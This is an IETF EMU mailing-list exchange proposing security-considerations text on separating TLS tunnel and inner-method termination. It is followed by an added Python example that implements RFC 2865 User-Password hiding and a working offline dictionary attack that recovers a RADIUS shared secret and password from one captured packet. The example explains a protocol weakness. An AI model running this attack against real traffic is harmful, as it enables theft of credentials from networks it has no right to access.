How about adding the following section to the security considerations:

"Separation of TLS tunnel and inner authentication termination

Terminating the inner method at a different location than the outer tunnel needs careful consideration. The inner method data may be vulnerable to modification and eavesdropping between the server that terminates the tunnel and the server that terminates the inner method. For example, if a clear text password is used then it may be sent to the inner method server in a RADIUS password attribute, which uses weak encryption that may not be suitable protection for many environments. In some cases terminating the tunnel at a different location may make it difficult for a peer to authenticate the server and trust it for further communication. For example, if the TLS tunnel is terminated by a different organization, the peer needs to be able to authenticate and authorize the tunnel server to handle secret credentials that it shares with the home server that terminates the inner method. This may not meet the security policy of many environments."

Cheers,

Joe

> -----Original Message-----
> From: [email protected] [mailto:[email protected]] On
> Behalf Of Joseph Salowey (jsalowey)
> Sent: Thursday, August 06, 2009 1:23 PM
> To: [email protected]
> Subject: [Emu] Issue #24: Backend password attacks
>
> #24: Backend password attacks
>
> > Section 4.5
> >
> > "These typically
> > require the password in its original text form in order to
> > authenticate the peer, hence they require the peer to send
> > the clear
> > text user name and password to the EAP server."
> >
> > One of the issues with support for cleartext passwords is
> > the potential attacks against the AAA backend (e.g.
> > User-Password attribute) in split authentication scenarios.
> > Is it worth calling this out?
>
> How about adding the following to the security considerations section:
>
> "If the inner method is terminated at a different location
> than the outer tunnel then the inner method data may be
> vulnerable to modification and eavesdropping between the
> server that terminates the tunnel and the server
> that terminates the inner method. For example, if a clear text
> password is used then it may be sent to the inner method server in a
> RADIUS password attribute which uses weak encryption that
> may not be suitable protection for many environments."
>
> --
> Ticket URL: <http://wiki.tools.ietf.org/wg/emu/trac/ticket/24>
> emu <http://tools.ietf.org/wg/emu/>
>
> _______________________________________________
> Emu mailing list
> [email protected]
> https://www.ietf.org/mailman/listinfo/emu
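The "weak encryption" of the RADIUS User-Password attribute that the proposed text refers to, as an added example that is not part of the original thread or of any draft: the RFC 2865 section 5.2 password-hiding scheme in Python, followed by the offline dictionary attack on the shared secret that a packet capture on the link between the tunnel terminator and the home server makes possible. The shared secret, the password, the fixed Request Authenticator and the candidate word list are constructed for this example and are not from any real deployment.

```python
import hashlib

# Constructed sample values (hypothetical, not from any real deployment):
# the kind of cleartext password a TLS-tunnel terminator forwards to the
# home server inside a RADIUS Access-Request, and the shared secret that
# is the only thing protecting it on that hop.
SHARED_SECRET = b"radius123"
PASSWORD = b"hunter2"
# Fixed 16-byte Request Authenticator for determinism; a real client must
# generate a fresh unpredictable one per Access-Request.
REQUEST_AUTHENTICATOR = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def hide_user_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """RFC 2865 section 5.2 User-Password hiding.

    The password is NUL-padded to a multiple of 16 bytes; each block is XORed
    with MD5(secret + previous hidden block), the first block using the
    Request Authenticator in place of a previous block.  It is a keystream
    built from MD5, not an authenticated cipher, and its strength is bounded
    by the guessability of the shared secret.
    """
    if len(authenticator) != 16:
        raise ValueError("Request Authenticator must be 16 bytes")
    if not 0 < len(password) <= 128:
        raise ValueError("password must be 1..128 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    hidden = b""
    prev = authenticator
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = _xor(padded[i:i + 16], keystream)
        hidden += block
        prev = block
    return hidden


def reveal_user_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Invert hide_user_password; returns the still NUL-padded cleartext."""
    if not hidden or len(hidden) % 16:
        raise ValueError("hidden password must be a non-empty multiple of 16 bytes")
    padded = b""
    prev = authenticator
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        padded += _xor(hidden[i:i + 16], keystream)
        prev = hidden[i:i + 16]
    return padded


def plausible_padded_password(padded: bytes) -> bool:
    """Attack heuristic: printable ASCII followed only by NUL padding.

    A wrong secret yields pseudo-random bytes that almost never satisfy this."""
    body = padded.rstrip(b"\x00")
    return len(body) > 0 and all(0x20 <= c < 0x7F for c in body)


def recover_shared_secret(hidden: bytes, authenticator: bytes, candidates):
    """Offline dictionary attack on the shared secret from one captured
    Access-Request.  No knowledge of the password is needed: the NUL padding
    and the printable password bytes act as known plaintext that separates
    the correct secret from wrong guesses.  Returns the secret or None."""
    for candidate in candidates:
        if plausible_padded_password(reveal_user_password(hidden, candidate, authenticator)):
            return candidate
    return None


if __name__ == "__main__":
    # Attacker sees only the hidden attribute and the Request Authenticator,
    # both of which travel in the clear in the Access-Request.
    captured = hide_user_password(PASSWORD, SHARED_SECRET, REQUEST_AUTHENTICATOR)
    wordlist = [b"password", b"changeme", b"radius123", b"secret"]
    secret = recover_shared_secret(captured, REQUEST_AUTHENTICATOR, wordlist)
    print("recovered shared secret:", secret)
    if secret is not None:
        cleartext = reveal_user_password(captured, secret, REQUEST_AUTHENTICATOR).rstrip(b"\x00")
        print("recovered password:", cleartext)
```

Once the shared secret is recovered from one packet, every User-Password sent between those two servers under that secret, past and future, can be read from a capture, which is the exposure the proposed text describes for a tunnel terminated in one place and an inner method terminated in another. The heuristic rejects the correct secret only if the password itself contains non-printable bytes, and a false match on a wrong guess is astronomically unlikely for a 16-byte block. The scheme gives no integrity protection either, so modification on that hop is not detected by this attribute alone.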
